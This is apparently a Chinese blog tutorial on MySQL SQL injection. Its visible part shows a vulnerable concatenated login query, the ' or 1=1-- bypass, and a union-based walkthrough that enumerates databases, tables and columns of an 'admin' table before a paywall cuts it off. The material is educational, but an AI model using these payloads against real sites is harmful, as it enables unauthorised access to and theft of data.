MySQL sql注入和数据库的优化详解

最新推荐文章于 2023-02-09 13:58:32 发布
最新推荐文章于 2023-02-09 13:58:32 发布
阅读量1.2k 收藏 5
点赞数
分类专栏: MySQL 文章标签: 数据库 mysql sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51596354/article/details/122112998
版权

MySQL注入优化

学习目标

  1. 了解SQL注入原理
  2. 掌握防止SQL注入的方法
  3. 了解SQL优化方法

SQL 注入

SQL注入是通过SQL语法的漏洞,盗取数据、修改数据等的操作。

假设有如下查询语法:

SELECT ? FROM  ? WHERE  ? LIKE  '%好%';

其中'%好%'为搜索的关键词,表示搜索带有好字的内容

假如把搜索的关键词改为:'%';--好%',就能查询全部数据。

案例

举一个比较常见的例子来简要说明一下sql注入的原理。

假如我们有一个users表,里面有两个字段username和password。在我们的java代码中我们初学者都习惯用sql拼接的方式进行用户验证。

String sql = "select id from users where username = '" + username + "' and password = '" + password + "'"

这里的username和password都是我们存取从web表单获得的数据。

下面我们来看一下一种简单的注入,如果我们在表单中username的输入框中输入' or 1=1-- ,password的表单中随便输入一些东西,假如这里输入123。此时我们所要执行的sql语句就变成了

select id from users where username = '' or 1=1-- and password = '123'

我们来看一下这个sql,因为1=1是true,后面 and password = '123’被注释掉了。所以这里完全跳过了sql验证。

注入中常用的函数与语法

  • Group_concat():将select的查询结果全部显示出来,占一个显示位
  • select version():查询MySQL版本
  • select user():查询数据库用户名
  • select database()):查询数据库名
  • select @@datadir():查询数据库的绝对路径
  • select @@version_compile_os:查询操作系统版本
  • select current_user():查询当前用户
  • Order by: 找列的数量
  • Union select:联合查询(联合查询的条件是前一条语句查询不到且字段数与前一条语句的查询字段数一致)
  • limit:限制显示个数(如:limit 0 2 表示从第一个开始显示两个)

判断是否存在sql注入漏洞。

  • 构建sql语句:?id=1 and 1=2 查看页面是否正常。结果页面显示不正常。

  • 注释:因为id=1为真(可正常访问页面),且1=2为假,所以and条件永远不会成立。对于web应用不会返回结果给用户。则攻击者能看到的是一个错误的界面或者页面结果为空。当然,如果攻击者构造的请求异常,也会导致页面访问不正常。

  • 构建新的sql语句,确定是否存在语句逻辑错误导致页面不正常。?id=1 and 1=1 结果页面正常,初步判断存在sql漏洞。

    注释:1=1 为真,and条件语句成立。

判断字段数:

  • 构建sql语句:
    • ?id=1 and 1=1 order by 1 判断网页是否正常。
    • ?id=1 and 1=1 order by 2 判断网页是否正常。
    • ?id=1 and 1=1 order by 3 判断网页是否正常。
    • 结果:?id=1 and 1=1 order by 3 网页显示不正常,可以判断字段数为2
    • 注释:“order by 1”表示对第一栏位进行排序,

判断回显点:

  • 构建sql语句:

    ?id=1 and 1=2 union select 1,2

    (之后的查询结果将显示在下图红框位置)

    • 注释:union 操作符用于合并两个或多个select语句的结果集,union内部的select语句必须拥有相同数量的列。

获取信息

查看当前数据库名以及数据库版本。

  • 构建sql语句:

    ?id=1 and 1=2 union select 1,database();?id=1 and 1=2 unio select 1, version()
    • 注释:
      • union select 1 ,database(),其中数字1占一列,凑数,用来满足union定义。
      • database():表示网站使用的数据库,version():表示当前mysql的版本,usr():当前mysql的用户。

查询当前数据库以及表名称。

  • 构建sql语句:

    ?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 0,1
    • 注释:
      • information_schema数据库用于存储数据库元数据,例如:数据库名,表名,列的数据类型,访问权限等。
      • tables用来存储数据库中的表的信息,包括表属于哪个数据库,表的类型,存储引擎,创建时间等。t
      • able_schema和table_schema是表tables中的数据库库名和表名。
      • limit 0,1 表示第一行显示一行数据。
      • limit 1,1表示第二行显示一行数据。

查询表admin中的字段名。

查询三个字段:id、username 、password

  • 构建SQL语句:?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 0,1
  • 构建SQL语句:?id=1 and 1=2 union select 1,column_name from informati
最低0.47元/天 解锁文章
抹泪的知更鸟
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
MySQL解决SQL注入的另类方法详解
09-10
SQL注入是一种常见的网络安全威胁,攻击者通过构造恶意的SQL语句来获取、修改、删除数据库中的数据,甚至控制系统。在MySQL中,防止SQL注入有多种方法,包括使用预编译语句、参数化查询、转义特殊字符等。本文主要...
MySQL数据库优化详解
09-10
MySQL数据库优化是一个涵盖广泛的主题,涉及多个层面,包括查询优化、表结构优化、索引管理、存储引擎选择、视图和函数的运用等。以下是对这些方面的一些详细说明: 1. **表复制**:在MySQL中,复制表结构和数据...
SQL注入SQL优化
HerryBody
09-12 287
目录 什么是SQL注入 SQL注入原理 SQL注入有哪几种注入类型 SQL注入的危害及防御? 危害 防御 SQL优化的具体操作: 什么是SQL注入 SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。 SQL注入原理 SQL注入攻击指的是通过构建特殊的输入作为参数传入Web
SQL注入优化
weixin_48907777的博客
08-27 326
SQL注入 什么是SQL注入 ### 百度百科: ​ SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。 ​ 详细点击查看: https://baike.baidu.com/item/sql%E6%B3%A8%E5%85%A5/150289?fr=aladdin ​ 学了三个月的java
SQL注入SQL优化
kanglijun_2011的博客
03-20 240
1、SQL注入漏洞 由于“’1′=’1′”这个表达式永远返回 true,而 true 与任何布尔值的 or 运算的结果都是 true,那么无论正确密码是什么“Password=’1′ or ’1′=’1′”的计算值永远是 true,这样恶意攻击者就可以使用任何帐户登录系统了。这样的漏洞就被称作“SQL 注入漏洞(SQL Injection)”。 对付 SQL 注入漏洞有两种方式:过滤敏感字...
SQL注入原理以及优化方式
学习笔记。
05-31 146
SQL注入原理 一般用户登录用的SQL语句为:SELECT * FROM user WHERE username=‘admin’ AND password=‘passwd’,此处admin和passwd分别为用户输入的用户名和密码,如果程序员没有对用户输入的用户名和密码做处理,就可以构造万能密码成功绕过登录验证,如用户输入’or 1#,SQL语句将变为:SELECT * FROM user WHERE username=’‘or 1#’ AND password=’’,‘’or 1为TRUE,#注释掉后面.
mysql问题一(sql注入和性能优化
weixin_44638539的博客
09-06 106
一:sql注入 当要执行的sql语句为 select *from user where name=“daming” or “a”=“a”; 这个sql恒成立,这样造成能够即便输入错误也能查询到数据库所有内容 如何防止: 变量使用?代替,例如:select *from user where name=?,这样sql语句不会发生改变, 即便表单提交为“daming or ‘a’’=‘a’ ",也会把整体当一个字符取查询。 二:性能优化 当明确查询结果是一条数据的时候,加上limit 1,可以提高查询效率 例如:
三种数据库SQL 注入详解
最新发布
08-03
三种数据库SQL 注入详解 SQL 注入是指攻击者通过构建特殊的输入作为参数传入 Web 应用程序,而这些输入大都是 SQL 语法里的组合,通过执行 SQL 语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤...
php mysql操作mysql_connect连接数据库实例详解
10-20
`mysqli`和`PDO`提供了更好的功能,如预处理语句,可以防止SQL注入等安全问题,并且它们支持面向对象和面向过程两种编程风格。 ### 使用`mysqli`替代`mysql_connect` ```php $host = "mysql153.secureserver.net...
SQL注入】盲注优化
尚未佩妥剑 转眼便江湖
12-20 945
SQL注入之盲注优化技术 典型时间型盲注示例代码: <?php header('content-type:text/html;charset=utf-8'); @$id=$_GET['id']; //传参 if(!isset($id)){ die('请传入GET方法id参数值'); } $mysqli=new mysqli(); ...
SQL注入漏洞和SQL优化
weixin_33708432的博客
03-17 72
2019独角兽企业重金招聘Python工程师标准>>> ...
解决SQL注入问题
qq_51328499的博客
11-28 1083
什么是SQL注入 当我们使用Statement进行操作时,在执行sql语句时,存在参数拼凑成恒等表达式的问题,如以下代码 public class TestStatement { public static void main(String[] args) { String url = "jdbc:oracle:thin:@192.168.200.128:1521:XE"; String username = "HR"; Stri...
sql注入
frutrue的博客
10-26 967
简单的sql注入笔记: 一、sql注入 sql注入sql injection)被称为sql数据库结构化查询,是由于程序员在编写代码时的不严谨所造成的漏洞,它能让外部人员通过sql语句,查询到数据库的重要内容,容易造成数据泄露,隐私文件被读取,财产损失等。 sql注入条件: 1.参数用户可控:前端传给后端的参数用户可控。 2.参数带入数据库查询:传入的参数拼接到SQL语句中,且带入数据库中查询 只要存在着两个条件,就有可能产生sql注入漏洞。现在市面上的数据库类型有Access,mysql,mssql,P
mysql手工注入语句_mysql手工注入学习笔记
weixin_34585343的博客
01-19 227
less-1(普通字符型)加’可知可能是字符型注入用and来确认说明存在注入order by查询字段数存在3个字段union select查询在页面中显示的位置查询数据库查询表查字段查内容less2(普通数值型)数字型的less3(带括号字符型)使用’可知可能是拼接型的字符型注入使用and判断确定是注入点order by查询字段数less4(带括号双引号字符型)使用’以及数值型无法判断,使用%81...
mysql注入之长字符截断、orderby注入、HTTP分割注入、limit注入
Thunderclap的博客
02-23 6027
长字符截断/SQL约束攻击:MySQL对插入超长的值只会提示warning,而不是error,这样就会导致一些截断问题。 order byrand(True) /order by rand(False)盲注:原语句类似为$id=$_GET['sort']; select * from users order by $id ; HTTP分割注入:用内联注释把password注释掉,凑成一条新语句后注释或闭合掉后面的语句。 limit注入:分为存在order by和不存在orderby场景。
SQL盲注加速方法总结
tpaer的博客
02-09 3157
SQL盲注加速方法二分法加速、.与运算加速、.二进制延时注入加速、dnslog OOB外带通信总结。
有效防止sql注入的方法_sql注入有效负载列表
weixin_26747751的博客
09-11 426
有效防止sql注入的方法In this section, we’ll explain what SQL injection is, describe some common examples, explain how to find and exploit various kinds of SQL injection vulnerabilities, and summarize how to pr...
SQL注入优化和绕过
dfdhxb995397的博客
07-24 394
作者:Arizona 原文来自:https://bbs.ichunqiu.com/thread-43169-1-1.html 0×00 ~ 介绍 SQL注入毫无疑问是最危险的Web漏洞之一,因为我们将所有信息都存储在数据库中。其解决方案之一,有许多公司实施Web应用程序防火墙和入侵检测/预防系统来试图保护自己。但不幸的是,这些对策往往是不充分的,并且很容易被绕过。 尽管不能依赖防...
深入浅出SQL注入
爱技术 爱生活
11-11 2786
之前在做学生信息管理系统和机房收费系统的时候,对于SQL注入的问题已经是司空见惯,但是并没有真正的地形象生动的理解SQL注入到底是什么玩意儿.直到这次做牛腩才在牛老师的举例之下,明白了原来SQL注入是真的很危险啊. 问题提出     我们先来构造一个简单的添加新闻类别的程序,在动态网页上添加一个TextBox控件,一个Button控件,一个GridView控件。布局如下图所示: 然后
MySQL数据库优化技巧详解
"MySQL数据库优化文档,由李捷主讲,涵盖了Mysql基础操作、Sql技巧、Sql语句优化数据库优化、Myisam表锁、服务器优化等多个方面,包括了表复制、索引创建与管理、视图、内置函数、预处理语句、事务处理、存储、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

抹泪的知更鸟

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值